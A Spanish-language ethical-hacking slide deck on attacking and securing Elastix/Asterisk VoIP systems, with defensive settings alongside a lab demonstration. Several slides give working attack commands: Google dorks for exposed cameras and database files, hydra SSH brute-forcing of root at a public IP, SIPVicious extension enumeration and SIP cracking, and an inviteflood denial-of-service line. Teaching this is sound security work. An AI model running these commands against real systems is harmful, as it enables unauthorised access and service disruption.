ethical hacking en plataformas de voz sobre ip (elastix)
DESCRIPTION
El presente trabajo muestra como se desarrolla un ataque elaborado por hackers a una plataforma Elastix utilizando herramientas de software libre para determinar vulnerabilidades. Puede replicarse este trabajo a otras plataformas basadas en Asterisk o de servicios de internet en general puesto que va acorde con los metodos de Hacking Ético.TRANSCRIPT
Ethical Hacking a plataformas de Telefonía IP
Elastix®
www.grupomaxi.com.ec
VoIP: Una sopa de protocolos
Que es Elastix?
Hardware
En donde lo encontramos ?
Central PBX IP
Ethical Hacking
Ethical Hacking
Ethical Hacking y hacker ético son términos utilizados para describir el “hacking “ realizado para ayudar a una compañía o individuo identificar los potenciales riesgos sobre una computadora o red. Un hacker ético intenta vulnerar y penetrar dentro de un sistema de seguridad a través de cualquier falla de seguridad que podrían explotar otros hackers, con el objetivo de minimizar o eliminar cualquier potencial ataque.
Ethical Hacking
Hacker La persona que hackea
Cracker Intruso/Destructor a un sistema
HACKING CON MALAS INTENCIONES ES CRACKING • La diferencia básica entre hackers y crackers es que un hacker no hace nada
desastroso. • Cracking da lugar a resultados devastadores • Cracking es un crimen • El Cyber Crimen es resultado de cracking, no del hacking
.
Hackers en la Historia
Ethical Hacking Objeto de Evaluación:
• Un sistema de información o infraestructura que requiere una evaluación de seguridad
Ataque:
• Un asalto a la seguridad del sistema, derivado de una amenaza inteligente
• Un ataque es la acción o el intento de violación a la seguridad
Exploit:
• Se define como una brecha en la seguridad de un sistema de información a través de una vulnerabilidad
Un 0 Day:
• Un ataque a la seguridad producido por un exploit
• Es una vulnerabilidad de una aplicación o programa que no es conocida o publica y que si es de conocimiento solo por los programadores
Ethical Hacking Tipos de Hacker:
• Black Hats
• White Hats
• Gray Hats
Etapas de Hacking
FOOTPRINT SCANNING Y ENUMERACIÓN
ANALISIS DE VULNERABILIDADES
OBTENCIÓN DE ACCESO
ESCALAMIENTO DE PRIVILEGIOS
TROFEO: EVIDENCIA BORRADO
DE RASTROS
Etapas de Hacking
• Footprint o reconocimiento
• Ejemplo: Google Dorks • inurl: /view/index.shtml //para ver camaras IP • intitle:index.of inurl:admin //ingreso como admin • inurl:”level/15/exec” //cisco • filetype:inc mysql_connect() //conexión de bases de datos • inurl:noticias.php?id= //busqueda paginas vulnerables
• Google Hacking Database: www.exploit-db.com/google-dorks/
Ejemplo: filetype:inc mysql_connect()
Ejemplo
Vectores de ataques en Elastix .....
Ataques Externos !!
Vectores de ataque en Elastix Externos / Desde Internet
Linux
- Password Cracking al servicio SSH - Revelación de configuración vía SNMP
Asterisk
- Ennumeración de entidades SIP - SIP Brute force attack a entidades SIP - Conexiones AMI
Vectores de ataque en Elastix Externos / Desde Internet
Aplicaciones Web
- SQL inyección - Cross Site Scripting o XSS - Exploits
Ataques internos !!
Internos / Desde la red LAN Vectores de ataque en Elastix
- Arp poisoning - Captura de tráfico de voz
Y los que nos hacemos nosotros!
Implementando seguridad en Elastix
Así como hay ataques también existen muchos mecanismos de seguridad….
Seguridad en Elastix Modulo de Firewall
Sirve para el manejo de puertos y servicios, la interface genera un conjunto de reglas basadas en iptables
Uso de fail2ban para SSH y Asterisk
Es posible asegurar completamente el servicio SSH y el servicio SIP de ASTERISK , detectando y bloqueando proactivamente ataques con Fail2ban
Seguridad en Elastix Tuneles SSH
Se suele utilizar para transportar un protocolo determinado a través de una red que, en condiciones normales, no lo aceptaría, por ejemplo ingresar a la interfaz web de Elastix, con solo tener abierto el puerto del servicio SSH y loguearse correctamente a este servicio.
Seguridad en Elastix Aseguramiento de comunicaciones con TLS
TLS (Transport Layer Security) Seguridad de la capa de transporte. Es un protocolo criptográfico que permite realizar comunicaciones seguras a través de la red de Internet.
Seguridad en Elastix Aseguramiento de comunicaciones con SRTP
El Secure Real-time Transport Protocol (o SRTP) proporciona cifrado, a nivel de RTP, evitando el ensamblaje del audio de las comunicaciones (por ejemplo con Wireshark)
Seguridad en Elastix Red Privadas Virtuales - VPN
Permite implementar una capa adicional de seguridad, a las conexiones remotas sobre todo de extensiones o troncales VoIP , en modo Roadwarrior o Net – to Net
Seguridad en Elastix Sistemas IDS e IPS
Snort, es un programa muy flexible y a la vez complejo. Provee un alto nivel de personalización, análisis de paquetes, diferentes modos de ejecución, base de reglas de alto alcance, diferente tipos de almacenamiento
Seguridad en Elastix Sistemas IDS e IPS
Snort, es un programa muy flexible y a la vez complejo. Provee un alto nivel de personalización, análisis de paquetes, diferentes modos de ejecución, base de reglas de alto alcance, diferente tipos de almacenamiento
Y ahora una demostración!
Etapas de Hacking
• Footprint o reconocimiento
• Fierce
• fierce -dns espe.edu.ec –threads 3 –wordlist hosts.txt
Ejemplos realizados con Kali Linux
Etapas de Hacking
• Footprint o reconocimiento
• nmap
• nmap –A Target //descubrir sistema operativo
Ejemplos realizados con Kali Linux
Etapas de Hacking
• Creación de Diccionarios con RSMANGLER
• 1. Crear archivo lista1.txt vi lista1.txt daniel • 2. Crear archivo lista2.txt daniel2 3. rsmangler.rb –f lista1.txt 4. rsmangler.rb --file lista1.txt > lista2.txt
Ejemplos realizados con Kali Linux
Etapas de Hacking
• Penetración
• hydra
• hydra -l root -P diccionario.txt 190.95.222.226 -t 8 -v ssh
Para ver logs del atacado: tail -f /var/log/secure
Ejemplos realizados con Kali Linux
Etapas de Hacking • Penetración con SIP VICIOUS
svmap / svwar / svcrack
• svmap 192.168.1.150 //mapear central IP
Ejemplos realizados con Kali Linux
Etapas de Hacking • Penetración con SIP VICIOUS • svwar –m INVITE --force 192.168.1.229 //enumerar
extensiones
Etapas de Hacking • Penetración con SIP VICIOUS
• svcrack –u102 192.168.1.229 –d diccionario.txt //SIP BRUTE
Etapas de Hacking
• DoS inviteflood eth0 500 192.168.1.232 192.168.1.229 1000000 –a hacker –v
Hacking vía Exploits Exploit vtiger CRM
Hacking vía Exploits Exploit Elastix 2.2 (FreePBX 2.10)
Etapas de Hacking
• Como podrán darse cuenta, utilizando estas simples herramientas se ha realizado ataques sobre un servidor ELASTIX en ambiente de laboratorio, verificando varias vulnerabilidades, siendo las mas peligrosas los ataques vía exploits en versiones antiguas. Cuantos otros exploits existen que aun no conocemos?????
Etapas de Hacking
• Como protegerse? Cerrar Puertos / VPN / fail2ban / snort… y mucho
mas! todo depende de la paranoia
• Asegurando Asterisk
• alwaysauthreject=yes • allowguest=no • call-limit=2
• SIP-TLS y sRTP
Y LO MEJOR .... TODO DE LO QUE HEMOS HABLADO ... ES :
Gracias !! Ing. Daniel Guevara Consultor de VoIP y Ethical Hacking de Telefonía IP ECE®, ESM®, CCNA, KCE
Correo : [email protected] Gtalk: [email protected] www.grupomaxi.com.ec @danielguevara22
Bibliografía • Implementando Seguridad en plataformas de software libre Elastix, Juan Oliva, diapositivas Minga EC, http://jroliva.wordpress.com/ • Comunicaciones Unificadas con Elastix, Vol I y II, 2da edición Landivar, Edgar. • Prácticas de Laboratorio del curso Elastix Security Master
• Estas diapositivas han sido presentadas en: Universidad Internacional del Ecuador Sede Loja, Escuela Politécnica Nacional, Universidad Técnica del Norte y Escuela Politécnica del Litoral. (Ecuador) Se liberan bajo licencia Creative Commons. Agradezco Juan Oliva por facilitarme gran parte del material.